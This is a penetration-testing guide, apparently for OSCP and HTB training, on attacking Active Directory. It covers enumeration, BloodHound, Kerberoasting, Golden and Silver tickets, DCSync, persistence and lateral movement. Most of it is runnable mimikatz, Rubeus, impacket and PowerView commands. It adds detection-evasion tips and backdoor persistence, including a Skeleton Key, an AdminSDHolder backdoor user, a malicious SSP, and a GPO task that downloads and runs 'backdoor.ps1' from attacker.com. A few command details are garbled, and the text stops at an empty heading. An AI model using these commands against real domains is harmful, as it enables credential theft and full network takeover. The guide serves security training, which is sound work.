Penetration Testing - Active Directory Attacks Guide
Category: Penetration Testing - Phase 5
Tags: oscp, htb, active-directory, kerberoasting, bloodhound, golden-ticket, lateral-movement, domain-dominance
Active Directory Attack Methodology
What this phase covers: Comprehensive Active Directory (AD) attack techniques including enumeration, credential attacks, privilege escalation, lateral movement, and domain persistence in Windows domain environments.
Why Active Directory mastery is critical: AD is the backbone of enterprise Windows networks. Modern HTB challenges and OSCP scenarios heavily feature AD environments. Domain compromise provides access to entire organizational infrastructure.
HTB/OSCP Active Directory Approach: Domain enumeration → Credential acquisition → Lateral movement → Privilege escalation → Domain persistence → Data exfiltration.
Active Directory Fundamentals
Active Directory Architecture Understanding
What Active Directory provides: Centralized authentication, authorization, and directory services for Windows networks. Manages users, computers, groups, and resources across enterprise environments.
Why understanding AD architecture matters: Effective AD attacks require deep understanding of domain structure, trust relationships, authentication protocols, and administrative delegation models.
Key AD Components:
- Domain Controllers (DCs) - Servers hosting AD database and services
- Domains - Administrative boundaries containing AD objects
- Forests - Collections of domains sharing common schema
- Organizational Units (OUs) - Containers for organizing AD objects
- Group Policy Objects (GPOs) - Centralized configuration management
- Service Principal Names (SPNs) - Service authentication identifiers
# Active Directory enumeration fundamentals
# Initial domain information gathering
nltest /dclist:domain.local # List domain controllers
net time /domain # Get domain time (indicates DC)
echo %USERDOMAIN% # Current user's domain
echo %LOGONSERVER% # Logon server (typically DC)
# Domain user and group enumeration
net user /domain # List domain users
net group /domain # List domain groups
net group "Domain Admins" /domain # Domain administrator accounts
net group "Enterprise Admins" /domain # Enterprise administrator accounts
net group "Schema Admins" /domain # Schema administrator accounts
# Computer enumeration
net group "Domain Computers" /domain # Domain-joined computers
nltest /domain_trusts # Domain trust relationships
nltest /trusted_domains # Trusted domains
# Why basic enumeration is essential:
# - Identifies domain structure and relationships
# - Reveals high-privilege accounts and groups
# - Shows trust relationships for lateral movement
# - Provides baseline for advanced enumeration
PowerShell Active Directory Enumeration
What PowerShell AD enumeration provides: Native Windows capabilities for comprehensive domain reconnaissance without additional tools.
Why PowerShell is powerful for AD: Built into Windows, uses legitimate AD APIs, provides detailed information, and operates below many detection thresholds.
# PowerShell AD Module (if available)
Import-Module ActiveDirectory
Get-ADDomain # Domain information
Get-ADForest # Forest information
Get-ADDomainController # Domain controller details
# PowerShell without AD Module (more common in pentests)
# Domain information
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# User enumeration
([adsisearcher]"(&(objectCategory=person)(objectClass=user))").FindAll() | ForEach-Object {$_.Properties.samaccountname}
# Computer enumeration
([adsisearcher]"(&(objectCategory=computer)(objectClass=computer))").FindAll() | ForEach-Object {$_.Properties.dnshostname}
# Group enumeration
([adsisearcher]"(&(objectCategory=group)(objectClass=group))").FindAll() | ForEach-Object {$_.Properties.samaccountname}
# Service Principal Name (SPN) enumeration
setspn -T domain.local -Q */* # All SPNs in domain
([adsisearcher]"(&(objectCategory=computer)(servicePrincipalName=*))").FindAll() | ForEach-Object {$_.Properties.serviceprincipalname}
# Advanced PowerShell enumeration
# Find users with SPN (Kerberoastable)
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))").FindAll()
# Find computers with unconstrained delegation
([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))").FindAll()
# Find users with "Do not require Kerberos preauthentication" (ASREPRoastable)
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))").FindAll()
# Why PowerShell enumeration is effective:
# - Native Windows functionality (harder to detect)
# - No additional tools required
# - Comprehensive AD information access
# - Scriptable for automation
# - Works in constrained environments
BloodHound for Active Directory Analysis
BloodHound Setup and Data Collection
What BloodHound is: Graph-based Active Directory analysis tool that identifies attack paths, privilege escalation opportunities, and relationships between AD objects.
Why BloodHound is essential: Visualizes complex AD relationships, identifies shortest paths to domain admin, reveals hidden attack vectors, and provides comprehensive domain analysis.
When to use BloodHound: Early in AD enumeration for attack path identification, privilege escalation planning, and comprehensive domain mapping.
# BloodHound data collection methods
# Method 1: SharpHound.exe (C# collector)
# Download SharpHound from GitHub releases
.\SharpHound.exe -c All # Collect all data types
.\SharpHound.exe -c Default # Default collection (faster)
.\SharpHound.exe -c DCOnly # Domain controller data only
.\SharpHound.exe -c ComputerOnly # Computer objects only
# Stealth collection options
.\SharpHound.exe -c All --stealth # Stealth mode (slower, less detectable)
.\SharpHound.exe -c All --excludedc # Exclude domain controller enumeration
.\SharpHound.exe -c All --throttle 1000 # Add delay between requests (1 second)
# Method 2: SharpHound.ps1 (PowerShell collector)
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All # PowerShell-based collection
Invoke-BloodHound -CollectionMethod Default,GPOLocalGroup # Specific collection methods
# Method 3: bloodhound-python (Linux-based remote collection)
bloodhound-python -u username -p password -d domain.local -dc dc01.domain.local
bloodhound-python -u username -p password -d domain.local -dc dc01.domain.local --collect All
# Method 4: AzureHound (for Azure/Hybrid environments)
.\AzureHound.exe -u username@domain.com -p password
# Why multiple collection methods:
# - Different environments have different constraints
# - Remote collection useful from Linux attack platforms
# - PowerShell version bypasses some AV detection
# - Stealth options reduce detection risk
# - Azure integration for hybrid environments
# BloodHound database setup and analysis
# Start Neo4j database
sudo neo4j start # Linux
# Or use BloodHound CE (Community Edition) with built-in database
# Import collected data
# Drag and drop .zip files into BloodHound GUI
# Or use RESTful API for automated import
# Essential BloodHound queries
# Pre-built queries (in BloodHound GUI):
# - "Find Shortest Paths to Domain Admins"
# - "Find Principals with DCSync Rights"
# - "Find Computers with Unconstrained Delegation"
# - "Find Kerberoastable Users"
# - "Find ASREPRoastable Users"
# - "Find Computers where Domain Users are Local Admin"
# Custom Cypher queries
# Find shortest path to Domain Admins
MATCH (u:User {owned:true}), (g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}), p=shortestPath((u)-[*1..]->(g)) RETURN p
# Find computers where owned users have admin rights
MATCH (u:User {owned:true})-[:AdminTo]->(c:Computer) RETURN u.name, c.name
# Find users with DCSync privileges
MATCH (u:User)-[:GetChanges|GetChangesAll]->(d:Domain) RETURN u.name
# Why BloodHound analysis is crucial:
# - Identifies non-obvious attack paths
# - Reveals privilege escalation opportunities
# - Shows lateral movement possibilities
# - Prioritizes targets based on access paths
# - Provides visual representation of complex relationships
BloodHound Attack Path Analysis
# Interpreting BloodHound results for attack planning
# High-value targets identification
# 1. Domain Admins - Full domain control
# 2. Enterprise Admins - Multi-domain forest control
# 3. Schema Admins - Forest schema modification rights
# 4. Backup Operators - Often have broad file access
# 5. Account Operators - Can modify user accounts
# 6. Server Operators - Service management rights
# Attack path prioritization
# Shortest paths with fewest hops are often most viable
# Look for:
# - GenericAll/GenericWrite permissions
# - ForceChangePassword rights
# - AddMembers privileges on high-value groups
# - Local administrator rights on computers
# - Unconstrained delegation opportunities
# Common BloodHound attack patterns
## Pattern 1: GenericAll on User -> Password Reset -> Group Membership
# User A has GenericAll on User B
# Reset User B's password
# User B is member of high-privilege group
## Pattern 2: Local Admin -> Token Impersonation -> Domain Admin
# Current user is local admin on Computer A
# Domain Admin logs into Computer A
# Extract domain admin token/credentials
## Pattern 3: Group Membership Chain
# User -> Group A -> Group B -> Domain Admins
# Each group membership provides incremental privileges
## Pattern 4: Computer Account Takeover
# Service account with SPN -> Kerberoast -> Computer Account Access
# Computer account often has additional privileges
# BloodHound-guided attack execution
# Example: Exploiting "GenericAll" permission
# BloodHound shows: USER01 has GenericAll on USER02
# USER02 is member of "Backup Operators"
# Step 1: Reset target user password
net user USER02 NewPassword123! /domain
# Step 2: Authenticate as target user
runas /user:domain\USER02 cmd.exe
# Step 3: Leverage group membership privileges
# Backup Operators can backup/restore files including SAM database
# Why BloodHound-guided attacks are effective:
# - Based on actual AD relationships and permissions
# - Identifies multi-hop attack chains
# - Reveals non-obvious privilege escalation paths
# - Provides clear step-by-step attack methodology
Kerberos-Based Attacks
Kerberoasting
What Kerberoasting is: Attack technique that targets service accounts with Service Principal Names (SPNs). Requests service tickets encrypted with service account passwords, then cracks offline.
Why Kerberoasting is effective: Service accounts often have weak passwords, run with high privileges, and password changes are infrequent. Attack is difficult to detect and can be performed by any domain user.
When to use Kerberoasting: Early in AD compromise for credential acquisition, when needing higher privileges, or when other attack vectors are blocked.
# Kerberoasting methodology
# Step 1: SPN enumeration
setspn -T domain.local -Q */* # List all SPNs in domain
# Look for interesting services:
# - MSSQLSvc (SQL Server service accounts)
# - HTTP (Web application service accounts)
# - SAPService (SAP application accounts)
# - FIMService (Forefront Identity Manager)
# PowerShell SPN enumeration
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))").FindAll() | ForEach-Object {
Write-Host "User: " $_.Properties.samaccountname
Write-Host "SPN: " $_.Properties.serviceprincipalname
Write-Host "---"
}
# Step 2: Request service tickets
# Method 1: Using built-in Windows tools
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/sql01.domain.local:1433"
# Method 2: Using Rubeus
.\Rubeus.exe kerberoast # Kerberoast all SPNs
.\Rubeus.exe kerberoast /user:svcSQL # Target specific user
.\Rubeus.exe kerberoast /domain:domain.local # Specify domain
.\Rubeus.exe kerberoast /outfile:tickets.txt # Save to file
# Method 3: Using Invoke-Kerberoast (PowerShell)
# Download from PowerShellEmpire or PowerSploit
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat # Hashcat format
Invoke-Kerberoast -OutputFormat John # John the Ripper format
# Method 4: Using impacket-GetUserSPNs (from Linux)
impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request
impacket-GetUserSPNs domain.local/user:password -dc-ip 192.168.1.10 -request-user svcSQL
# Step 3: Extract tickets from memory
# Using mimikatz
mimikatz "kerberos::list /export" # Export all Kerberos tickets
# Using Rubeus
.\Rubeus.exe dump # Dump all tickets from current session
.\Rubeus.exe dump /service:MSSQLSvc # Dump specific service tickets
# Step 4: Crack service account passwords
# Using hashcat
hashcat -m 13100 tickets.txt rockyou.txt # Kerberos 5 TGS-REP mode
hashcat -m 13100 tickets.txt --rules-file=best64.rule rockyou.txt
# Using john the ripper
john --wordlist=rockyou.txt tickets.txt # Basic dictionary attack
john --rules --wordlist=rockyou.txt tickets.txt # With rules
# Advanced Kerberoasting techniques
# Targeted Kerberoasting (focus on high-value accounts)
# 1. Identify service accounts with high privileges
# 2. Check account password policies
# 3. Look for accounts with old passwords (LastPasswordSet)
# PowerShell to check password ages
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))").FindAll() | ForEach-Object {
$user = $_.Properties
$pwdLastSet = [datetime]::FromFileTime([long]$user.pwdlastset[0])
Write-Host "User:" $user.samaccountname "Last Password Set:" $pwdLastSet
}
# Kerberoasting evasion techniques
# Request tickets gradually to avoid detection
# Use different user accounts for requests
# Randomize timing between requests
# Why Kerberoasting is highly effective:
# - Any domain user can perform the attack
# - Service accounts often have weak passwords
# - Attack is difficult to detect
# - Offline password cracking provides persistent access
# - Service accounts often have elevated privileges
ASREPRoasting
What ASREPRoasting is: Attack targeting user accounts with "Do not require Kerberos preauthentication" setting. Requests AS-REP messages without preauthentication, then cracks user passwords offline.
Why ASREPRoasting works: Some accounts have preauthentication disabled for compatibility reasons. AS-REP messages contain user password hashes that can be cracked offline.
# ASREPRoasting methodology
# Step 1: Identify ASREPRoastable users
# PowerShell enumeration
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))").FindAll() | ForEach-Object {$_.Properties.samaccountname}
# LDAP query for ASREPRoastable accounts
ldapsearch -x -H ldap://dc01.domain.local -D "domain\user" -w "password" -b "DC=domain,DC=local" "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" samAccountName
# Step 2: Request AS-REP messages
# Using Rubeus
.\Rubeus.exe asreproast # ASREPRoast all vulnerable users
.\Rubeus.exe asreproast /user:username # Target specific user
.\Rubeus.exe asreproast /outfile:asrep.txt # Save to file
# Using impacket-GetNPUsers (from Linux)
impacket-GetNPUsers domain.local/ -dc-ip 192.168.1.10 -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt
# Manual AS-REP request (advanced)
# Using custom PowerShell or C# code to request AS-REP without preauthentication
# Step 3: Crack AS-REP hashes
# Using hashcat
hashcat -m 18200 asrep.txt rockyou.txt # Kerberos 5 AS-REP mode
# Using john the ripper
john --wordlist=rockyou.txt asrep.txt
# ASREPRoasting without credentials (anonymous)
# If anonymous LDAP access is allowed
impacket-GetNPUsers domain.local/ -dc-ip 192.168.1.10 -no-pass -usersfile users.txt
# Targeted ASREPRoasting
# Focus on high-privilege accounts that might have preauthentication disabled
# Check service accounts and administrative accounts
# Why ASREPRoasting is valuable:
# - Can be performed without domain credentials (if anonymous LDAP allowed)
# - Targets user accounts directly
# - Often overlooks by administrators
# - Provides another vector for credential acquisition
Golden Ticket Attacks
What Golden Ticket attacks are: Advanced persistence technique using forged Kerberos Ticket Granting Tickets (TGTs) with the KRBTGT account hash. Provides persistent domain access independent of password changes.
Why Golden Tickets are powerful: Complete domain persistence, bypasses most security controls, difficult to detect, and survives password resets of compromised accounts.
When to use Golden Tickets: After achieving domain admin access, for long-term persistence, and for covert access to domain resources.
# Golden Ticket attack requirements
# 1. KRBTGT account password hash (requires Domain Admin access)
# 2. Domain SID
# 3. Target username to impersonate
# Step 1: Obtain KRBTGT hash
# Using mimikatz (requires Domain Admin privileges)
mimikatz "privilege::debug" "lsadump::dcsync /user:krbtgt" "exit"
# Alternative: Extract from domain controller SAM/NTDS.dit
# Using impacket-secretsdump (from Linux)
impacket-secretsdump domain.local/admin:password@dc01.domain.local -just-dc-user krbtgt
# Step 2: Get domain SID
# PowerShell method
(Get-ADDomain).DomainSID.Value
# Alternative method
wmic useraccount where name='administrator' get sid
# Remove last number to get domain SID (e.g., S-1-5-21-1234567890-1234567890-1234567890)
# Step 3: Create Golden Ticket
# Using mimikatz
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff /ptt"
# Parameters explanation:
# /user: Username to impersonate
# /domain: Target domain
# /sid: Domain SID
# /krbtgt: KRBTGT account NTLM hash
# /ptt: Pass the ticket (inject into current session)
# Alternative: Save ticket to file
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:d9485863c1e9e05851aa40cbb4ab9dff /ticket:golden.kirbi"
# Step 4: Use Golden Ticket
# If ticket was injected (/ptt), can immediately access domain resources
dir \\dc01.domain.local\c$
psexec \\dc01.domain.local cmd.exe
# If ticket was saved to file, load it first
mimikatz "kerberos::ptt golden.kirbi"
# Using Rubeus for Golden Ticket creation
.\Rubeus.exe golden /rc4:d9485863c1e9e05851aa40cbb4ab9dff /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /ptt
# Advanced Golden Ticket techniques
# Custom group memberships
mimikatz "kerberos::golden /user:normaluser /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:d9485863c1e9e05851aa40cbb4ab9dff /groups:512,513,518,519,520 /ptt"
# Groups: 512=Domain Admins, 513=Domain Users, 518=Schema Admins, 519=Enterprise Admins, 520=Group Policy Creator Owners
# Extended validity period
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:d9485863c1e9e05851aa40cbb4ab9dff /startoffset:-10 /endin:600 /renewmax:10080 /ptt"
# /startoffset: Start time offset in minutes
# /endin: Ticket lifetime in minutes
# /renewmax: Maximum renewal time in minutes
# Why Golden Tickets are ultimate persistence:
# - Survives password changes (except KRBTGT)
# - Bypasses most authentication controls
# - Can impersonate any user including non-existent ones
# - Difficult to detect without specific monitoring
# - Provides complete domain access
Silver Ticket Attacks
What Silver Ticket attacks are: Forged Kerberos service tickets using compromised service account password hashes. Provides persistent access to specific services without domain admin privileges.
Why Silver Tickets are useful: More targeted than Golden Tickets, require only service account hash, harder to detect, and provide persistent service access.
# Silver Ticket attack methodology
# Step 1: Obtain service account hash
# Through Kerberoasting and password cracking
# Or through local privilege escalation on service host
# Or through LSASS memory dump
# Step 2: Gather required information
# Service Principal Name (SPN)
setspn -L serviceaccount # List SPNs for service account
# Service host domain SID
# Service account password hash (NTLM)
# Step 3: Create Silver Ticket
# Using mimikatz
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.domain.local /rc4:aad3b435b51404eeaad3b435b51404ee:hash /service:MSSQLSvc /ptt"
# Parameters explanation:
# /target: Target service host
# /service: Service type (MSSQLSvc, HTTP, CIFS, etc.)
# /rc4: Service account NTLM hash
# Common service types for Silver Tickets:
# - CIFS: File sharing access
# - HTTP: Web application access
# - MSSQLSvc: SQL Server access
# - LDAP: Directory service access
# - HOST: Various host services
# Step 4: Access target service
# Example: SQL Server access
sqlcmd -S sql01.domain.local -E # Windows authentication
# Example: File share access
dir \\sql01.domain.local\c$
# Example: PowerShell remoting
Enter-PSSession -ComputerName sql01.domain.local
# Advanced Silver Ticket techniques
# Multiple service tickets for same host
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.domain.local /rc4:hash /service:CIFS /ptt"
mimikatz "kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.domain.local /rc4:hash /service:HOST /ptt"
# Custom user impersonation
# Silver tickets can impersonate any user for the specific service
mimikatz "kerberos::golden /user:normaluser /domain:domain.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.domain.local /rc4:hash /service:MSSQLSvc /ptt"
# Why Silver Tickets are effective:
# - More targeted and stealthy than Golden Tickets
# - Don't require domain admin privileges to create
# - Harder to detect (service-specific)
# - Provide persistent access to critical services
# - Can be used for lateral movement
DCSync and Advanced Persistence
DCSync Attack
What DCSync is: Advanced attack technique that impersonates a domain controller to request password hashes from other domain controllers using legitimate replication protocols.
Why DCSync is powerful: Uses legitimate AD replication, difficult to detect, extracts all domain password hashes, and doesn't require interactive logon to domain controllers.
DCSync requirements: User account with GetChanges and GetChangesAll rights on domain object (typically Domain Admins, Enterprise Admins, or custom delegated accounts).
# DCSync attack execution
# Step 1: Verify DCSync privileges
# Check if current user has required permissions
# Using PowerView
Import-Module .\PowerView.ps1
Get-ObjectAcl -DistinguishedName "DC=domain,DC=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
# Step 2: Execute DCSync
# Using mimikatz
mimikatz "lsadump::dcsync /domain:domain.local /user:Administrator"
mimikatz "lsadump::dcsync /domain:domain.local /user:krbtgt"
mimikatz "lsadump::dcsync /domain:domain.local /all" # All users (noisy)
# Using impacket-secretsdump (from Linux)
impacket-secretsdump domain.local/admin:password@dc01.domain.local -just-dc
impacket-secretsdump domain.local/admin:password@dc01.domain.local -just-dc-user Administrator
# Step 3: Extract specific high-value accounts
# KRBTGT account (for Golden Tickets)
mimikatz "lsadump::dcsync /domain:domain.local /user:krbtgt"
# Computer accounts (for Silver Tickets)
mimikatz "lsadump::dcsync /domain:domain.local /user:SQL01$"
# Service accounts
mimikatz "lsadump::dcsync /domain:domain.local /user:svcSQL"
# DCSync with specific domain controller
mimikatz "lsadump::dcsync /domain:domain.local /dc:dc01.domain.local /user:Administrator"
# Advanced DCSync techniques
# Targeted extraction to reduce detection
# Focus on specific high-value accounts rather than dumping all
# Using PowerShell for DCSync (advanced)
# Custom implementation using .NET Framework classes
# More stealthy but requires advanced programming skills
# DCSync detection evasion
# Spread requests over time
# Use different compromised accounts
# Target specific accounts rather than bulk extraction
# Monitor for detection and adjust techniques
# Why DCSync is critical for domain dominance:
# - Extracts all domain password hashes
# - Uses legitimate AD protocols
# - Doesn't require physical DC access
# - Enables Golden Ticket creation
# - Provides complete credential database
Advanced Persistence Techniques
What advanced AD persistence involves: Maintaining long-term access to Active Directory environments through multiple covert methods that survive password changes, system updates, and security improvements.
# Golden Ticket persistence (covered above)
# Most effective long-term persistence method
# AdminSDHolder persistence
# Modify AdminSDHolder object to grant persistent admin rights
# AdminSDHolder template is applied to privileged accounts every hour
# Add persistent backdoor user to AdminSDHolder ACL
# Using PowerView
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName backdooruser -Rights All
# DCShadow attack (advanced)
# Register fake domain controller to push malicious changes
# Requires two compromised domain controllers or DA privileges
# Extremely stealthy as changes appear legitimate
# Skeleton Key attack
# Inject master password into domain controller LSASS
# Allows authentication with any account using skeleton key password
mimikatz "privilege::debug" "misc::skeleton" "exit"
# Default skeleton key password: "mimikatz"
# Directory Service Restore Mode (DSRM) persistence
# DSRM account provides local admin access to domain controllers
# Extract DSRM password hash and use for persistence
mimikatz "token::elevate" "lsadump::sam" "exit"
# Look for local Administrator account hash
# Group Policy Object (GPO) persistence
# Modify existing GPOs to include persistent backdoors
# Create new GPOs linked to high-value OUs
# Add logon scripts, scheduled tasks, or registry modifications
# Using PowerSploit GPO functions
Import-Module .\PowerView.ps1
New-GPOImmediateTask -TaskName "WindowsUpdate" -GPODisplayName "Default Domain Policy" -CommandArguments "-c 'IEX(New-Object Net.WebClient).downloadString(''http://attacker.com/backdoor.ps1'')'" -Force
# Security Support Provider (SSP) persistence
# Install custom SSP to capture credentials
# Copy malicious DLL to system32 and register in registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilsa" /f
# Certificate persistence
# Request certificates for persistence
# Use certificates for authentication after password changes
certreq -new -machine request.inf cert.req
certreq -submit -config "CA01\CA" cert.req cert.cer
certreq -accept cert.cer
# Why multiple persistence methods are necessary:
# - Redundancy ensures continued access
# - Different methods survive different defensive actions
# - Layered persistence complicates incident response
# - Some methods are stealthier than others
# - Provides multiple attack vectors for re-entry
Lateral Movement Techniques
Pass the Hash
What Pass the Hash is: Authentication technique using NTLM password hashes directly instead of plaintext passwords to authenticate to remote systems.
Why Pass the Hash works: NTLM authentication protocol accepts password hashes, common in Windows environments, and doesn't require password cracking.
# Pass the Hash execution methods
# Using mimikatz
mimikatz "sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:aad3b435b51404eeaad3b435b51404ee:hash /run:cmd.exe"
# Opens new command prompt with Administrator's hash
# Using impacket-psexec (from Linux)
impacket-psexec domain.local/Administrator@192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:hash
impacket-wmiexec domain.local/Administrator@192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:hash
impacket-smbexec domain.local/Administrator@192.168.1.10 -hashes aad3b435b51404eeaad3b435b51404ee:hash
# Using CrackMapExec
crackmapexec smb 192.168.1.0/24 -u Administrator -H hash --exec-method wmiexec
crackmapexec smb 192.168.1.0/24 -u Administrator -H hash -x "whoami"
# Using Rubeus (Pass the Hash with Kerberos)
.\Rubeus.exe asktgt /user:Administrator /domain:domain.local /rc4:hash /ptt
# Then use standard Windows tools
# Pass the Hash with different protocols
## SMB/CIFS
smbclient //192.168.1.10/C$ -U domain.local/Administrator%aad3b435b51404eeaad3b435b51404ee:hash
## WMI
wmic /node:192.168.1.10 /user:domain.local\Administrator /password:aad3b435b51404eeaad3b435b51404ee:hash process call create "cmd.exe"
## RDP (if NLA is disabled)
# Using modified RDP clients that support hash authentication
# Pass the Hash scope and limitations
# Works with: SMB, WMI, PowerShell Remoting, SQL Server, some web applications
# Doesn't work with: Interactive logon, RDP (with NLA), most modern applications
# Why Pass the Hash is effective for lateral movement:
# - No need to crack passwords
# - Works across most Windows services
# - Leverages existing authentication protocols
# - Difficult to prevent without major architecture changes
# - Enables rapid lateral movement through network
Pass the Ticket
What Pass the Ticket is: Kerberos-based authentication using stolen or forged Kerberos tickets instead of passwords or hashes.
Why Pass the Ticket is powerful: Works with Kerberos authentication, can use legitimate tickets, and bypasses some hash-based protections.
# Pass the Ticket methodology
# Step 1: Extract Kerberos tickets
# Using mimikatz
mimikatz "sekurlsa::tickets /export" # Export all tickets from memory
mimikatz "kerberos::list" # List current tickets
# Using Rubeus
.\Rubeus.exe dump # Dump all tickets
.\Rubeus.exe dump /service:krbtgt # Dump TGTs only
.\Rubeus.exe dump /luid:0x3e4 # Dump tickets for specific logon session
# Step 2: Inject stolen tickets
# Using mimikatz
mimikatz "kerberos::ptt ticket.kirbi" # Pass single ticket
mimikatz "kerberos::ptc" # Pass all .kirbi files in current directory
# Using Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbi # Pass specific ticket
.\Rubeus.exe ptt /ticket:base64ticket # Pass base64-encoded ticket
# Step 3: Use injected tickets
# After ticket injection, use standard Windows tools
dir \\server.domain.local\c$
psexec \\server.domain.local cmd.exe
Enter-PSSession -ComputerName server.domain.local
# Advanced Pass the Ticket techniques
# Ticket conversion between formats
# .kirbi to .ccache for cross-platform use
impacket-ticketConverter ticket.kirbi ticket.ccache
# Using tickets from Linux
export KRB5CCNAME=ticket.ccache
impacket-psexec domain.local/user@server.domain.local -k -no-pass
# Ticket renewal and lifetime management
# Check ticket expiration
klist # Windows
klist -c ticket.ccache # Linux
# Renew tickets before expiration
kinit -R # Linux Kerberos renewal
# Golden/Silver ticket creation and use (covered in previous sections)
# Why Pass the Ticket complements Pass the Hash:
# - Works in Kerberos-only environments
# - Can leverage legitimate user sessions
# - Bypasses NTLM restrictions
# - Enables cross-platform attacks
# - Works with modern authentication protocols
Overpass the Hash
What Overpass the Hash is: Technique that uses NTLM password hashes to request Kerberos tickets, bridging NTLM and Kerberos authentication.
Why Overpass the Hash is useful: Combines benefits of both authentication methods, works in mixed environments, and can bypass some NTLM restrictions.
# Overpass the Hash execution
# Using mimikatz
mimikatz "sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:hash /run:powershell.exe"
# Then from the new PowerShell session:
klist # Verify no Kerberos tickets initially
net use \\dc01.domain.local\c$ # This will request a Kerberos ticket using the NTLM hash
klist # Now shows Kerberos tickets
# Using Rubeus
.\Rubeus.exe asktgt /user:Administrator /domain:domain.local /rc4:hash /ptt
# Requests TGT using NTLM hash and injects it
# Advanced Overpass the Hash
# Request specific service tickets
.\Rubeus.exe asktgs /ticket:base64tgt /service:cifs/server.domain.local /ptt
# Why Overpass the Hash is valuable:
# - Bridges NTLM and Kerberos authentication
# - Works in environments transitioning to Kerberos-only
# - Provides more authentication options
# - Can bypass some NTLM-specific detections
Enumeration and Intelligence Gathering
PowerView for Advanced AD Enumeration
What PowerView is: PowerShell-based Active Directory enumeration framework providing comprehensive domain reconnaissance capabilities.
Why PowerView is essential: Native PowerShell, extensive enumeration functions, identifies attack paths, and integrates with other PowerShell tools.
# PowerView setup and basic usage
Import-Module .\PowerView.ps1
# Or dot-source the script
. .\PowerView.ps1
# Domain information gathering
Get-Domain # Current domain information
Get-DomainController # Domain controller details
Get-Forest # Forest information
Get-ForestDomain # All domains in forest
# User enumeration
Get-DomainUser # All domain users
Get-DomainUser -Identity Administrator # Specific user details
Get-DomainUser -AdminCount # Users with AdminCount=1 (privileged)
Get-DomainUser -SPN # Users with Service Principal Names (Kerberoastable)
Get-DomainUser -PreauthNotRequired # ASREPRoastable users
# Group enumeration
Get-DomainGroup # All domain groups
Get-DomainGroup *admin* # Groups with "admin" in name
Get-DomainGroupMember "Domain Admins" # Members of specific group
Get-DomainGroupMember -Recurse "Domain Admins" # Recursive group membership
# Computer enumeration
Get-DomainComputer # All domain computers
Get-DomainComputer -Operating System "*Server*" # Server operating systems
Get-DomainComputer -Unconstrained # Computers with unconstrained delegation
Get-DomainComputer -TrustedToAuth # Computers trusted for delegation
# Permission and ACL analysis
Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDs # ACLs for Domain Admins group
Find-InterestingDomainAcl -ResolveGUIDs # Find interesting ACLs
Get-DomainObjectOwner -Identity "Domain Admins" # Object ownership
# Trust relationship analysis
Get-DomainTrust # Domain trusts
Get-ForestTrust # Forest trusts
Get-DomainTrustMapping # Map all trust relationships
# Share enumeration
Find-DomainShare # Find domain shares
Find-DomainShare -CheckShareAccess # Shares with current user access
Find-InterestingDomainShareFile # Find interesting files in shares
# Local administrator enumeration
Find-DomainLocalGroupMember # Find local group memberships
Find-DomainLocalGroupMember -GroupName Administrators # Local administrators
# Session enumeration
Get-DomainLoggedon -ComputerName server01 # Logged on users on specific computer
Get-NetSession -ComputerName server01 # Active sessions on computer
Find-DomainUserLocation # Find where specific users are logged in
# Group Policy enumeration
Get-DomainGPO # All Group Policy Objects
Get-DomainGPOLocalGroup # GPOs that modify local groups
Get-DomainGPOComputerLocalGroupMapping # Map GPOs to computers for local groups
# Why PowerView is comprehensive:
# - Hundreds of enumeration functions
# - Identifies privilege escalation paths
# - Maps trust relationships
# - Finds lateral movement opportunities
# - Integrates with attack workflows
LDAP Enumeration Techniques
What LDAP enumeration provides: Direct queries to Active Directory LDAP service for detailed object information and relationships.
Why LDAP enumeration is valuable: Provides raw AD data, works across platforms, and offers granular query capabilities.
# LDAP enumeration from Windows
# Using built-in tools
dsquery user # Query users
dsquery computer # Query computers
dsquery group # Query groups
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(adminCount=1))" # Custom LDAP filter
# Advanced LDAP queries
